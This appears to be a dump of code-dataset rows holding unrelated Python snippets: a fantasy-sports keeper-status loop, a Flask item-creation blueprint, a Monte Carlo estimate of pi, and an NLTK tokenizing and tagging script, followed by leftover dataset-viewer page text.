    for teamName, playerNamePositions in teamLoader.load("data/teams_" + str(currentYear) + ".csv"):
        owner = teamOwner(currentTeamName(canonicalName(teamName)))
        players = []
        for playerNamePosition in playerNamePositions:
            playerName = playerNamePosition[0]
            position = playerNamePosition[1]
            statusFinder = PlayerStatusFinder(canonicalName(playerName), position)
            # The None arguments appear to be unused three-years-ago
            # slots — TODO confirm against PlayerStatusFinder.findStatus.
            result = statusFinder.findStatus(currentYear, keepers, oneYearAgoTransactions, twoYearsAgoTransactions, None, oneYearAgoDraft, twoYearsAgoDraft, None)
            if result is not None:
                status, draftedYear, twoYearsAgoCost, oneYearAgoCost = result
                players.append(Player(playerName, position, status, draftedYear, twoYearsAgoCost, oneYearAgoCost))
            else:
                # A roster player with no resolvable history is fatal.
                raise Exception("Fail", "Missing player: " + playerName)
        teams.append(Team(teamName, owner, players))
    csvWriter = CSVWriter(teams, currentYear)
    csvWriter.writeToCSV("out/status_" + str(currentYear) + ".csv")
    # NOTE(review): dead code — `while False` never executes. This looks
    # like a deliberately disabled interactive lookup mode; consider
    # removing it or gating it behind a command-line flag.
    while False:
        player = input("Player?\n")
        if player == "":
            break
        playerStatusFinder = PlayerStatusFinder(canonicalName(player))
        status = playerStatusFinder.findStatus(currentYear, keepers, oneYearAgoTransactions, twoYearsAgoTransactions, None, oneYearAgoDraft, twoYearsAgoDraft, None)
        statusRepresentation = playerStatusFinder.statusRepresentation(status)
        print(statusRepresentation)
|
994,296 | 20c76bf6cb5343e4336bc3fa739238d00d7c85b5 | from flask import Blueprint, request, render_template,redirect,url_for
import json
from models.items import Item
item_blueprint = Blueprint("items",__name__)
@item_blueprint.route("/")
def index():
    """Render the item list page with every stored item."""
    return render_template("item/index.html", items=Item.getAll())
@item_blueprint.route("/new",methods=["GET","POST"]) # /items/new
def new_item():
    """Show the new-item form on GET; create and save an item on POST."""
    if request.method != "POST":
        return render_template("item/new_item.html")
    url = request.form['url']
    tag_name = request.form['tagName']
    # The 'query' field must contain a valid JSON object string,
    # e.g. {"id": "..."}; it is decoded into a dict before saving.
    query = json.loads(request.form['query'])
    Item(url, tag_name, query).save()
    return redirect(url_for("items.index"))
|
994,297 | 6cd6af7251aa8c2f9d637871e884db133b250520 | # This problem was asked by Google.
# The area of a circle is defined as pi*r^2. Estimate pi to 3 decimal places using a Monte Carlo method.
# Hint: The basic equation of a circle is x2 + y2 = r2.
# pi*r^2 = Area of circle
# x^2 + y^2 = r^2
#
# l * w = Area of square
# (2r) * (2r) = 4r^2 = Area of square
#
# Therefore, ratio(p) = Area of circle / Area of square
# p = pi*r^2 / 4r^2 = pi / 4
# pi = p * 4
#
# we can use monte carlo method to pick points on unit circle and get a ratio of the points that land inside the unit circle compared to the unit square. Such a ratio is similar to area ratio of circle to square. == p
import random
import math
def findPi(samples=100000):
    """Estimate pi by Monte Carlo sampling of the unit quarter-circle.

    Draws *samples* uniform points in the unit square [0, 1) x [0, 1);
    the fraction landing inside x^2 + y^2 <= 1 approximates pi/4, so the
    ratio times 4 approximates pi.

    samples -- number of random points to draw (default 100000 preserves
               the original behaviour)

    Returns the pi estimate as a float.

    Improvements: the sample count is now a parameter instead of a
    hard-coded constant, and an integer hit counter replaces the two
    float accumulators (the denominator was just the loop count).
    """
    random.seed()
    inCircle = 0
    for _ in range(samples):
        x = random.random()
        y = random.random()
        # Point falls inside the quarter circle of radius 1.
        if x * x + y * y <= 1.0:
            inCircle += 1
    # Multiply by 4.0 first so the division is true (float) division on
    # both Python 2 (which this script targets) and Python 3.
    return 4.0 * inCircle / samples
# Run the estimator once and compare against the true constant.
# (Python 2 print statements — this script targets Python 2.)
piMonteCarlo = findPi()
print "Estimate: %.3f" % piMonteCarlo
print "Actual: ", math.pi
994,298 | 86489b68a938ab7d6f8023d31d7f3815e4556ac9 | import os
import subprocess
# NLTK exploration script (Python 2: uses print statements and
# str.decode). Walks through tokenization, stopword filtering, WordNet
# lookups, and a unigram POS tagger trained on the treebank corpus.
# This grabs book data
# subprocess.call(["java","-jar", "pdfbox-app-2.0.2.jar",
# "ExtractText", "/Users/terences/Downloads/approximate_injectivity.pdf",
# "output/approximate_injectivity.txt"])
import nltk
# nltk.download()
# Load the pre-extracted book text and decode it to unicode.
text_file = ""
with open("output/MLfH.txt") as f:
    text_file = f.read()
text_file = text_file.decode('utf-8').strip()
# splits sentences
from nltk.tokenize import sent_tokenize
tokens = sent_tokenize(text_file)
# print tokens
# splits words (overwrites the sentence tokens above)
from nltk.tokenize import word_tokenize
tokens = word_tokenize(text_file)
# print tokens
# whitespace tokenizer: gaps=True splits ON the \s+ pattern
from nltk.tokenize import regexp_tokenize
tokenizer = regexp_tokenize(text_file,'\s+', gaps=True)
# print tokenizer
# English stopword set for filtering common words.
from nltk.corpus import stopwords
english_stops = set(stopwords.words('english'))
words = tokenizer
# print [word for word in words if word not in english_stops]
#look up words and print synset
# Take the first WordNet synset of 'cookbook' and explore its relations:
# hypernyms (more general), hyponyms (more specific), and the paths up
# to the root of the hypernym hierarchy.
from nltk.corpus import wordnet
syn = wordnet.synsets('cookbook')[0]
print syn.name()
print syn.definition()
print syn.hypernyms()
print syn.hypernyms()[0].hyponyms()
print syn.root_hypernyms()
print syn.hypernym_paths()
#
# for w in words:
#     print w
#     syn = wordnet.synsets(w)
#     if (type(syn) == 'list'):
#         syn = syn[0]
#     # print syn
#     if (len(syn) != 0):
#         for i in syn:
#             # print i
#             # print '\t[', i.name(),']'
#             print '\t--', i.definition()
# Train a unigram POS tagger on the first 3000 treebank sentences and
# tag the first treebank sentence as a smoke test.
from nltk.tag import UnigramTagger
from nltk.corpus import treebank
train_sents = treebank.tagged_sents()[:3000]
tagger = UnigramTagger(train_sents)
print tagger.tag(treebank.sents()[0])
994,299 | 21b0d4ef63797619f18d33b6c71892992e087797 | /Users/kmsnyder2/anaconda/lib/python3.6/copy.py |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.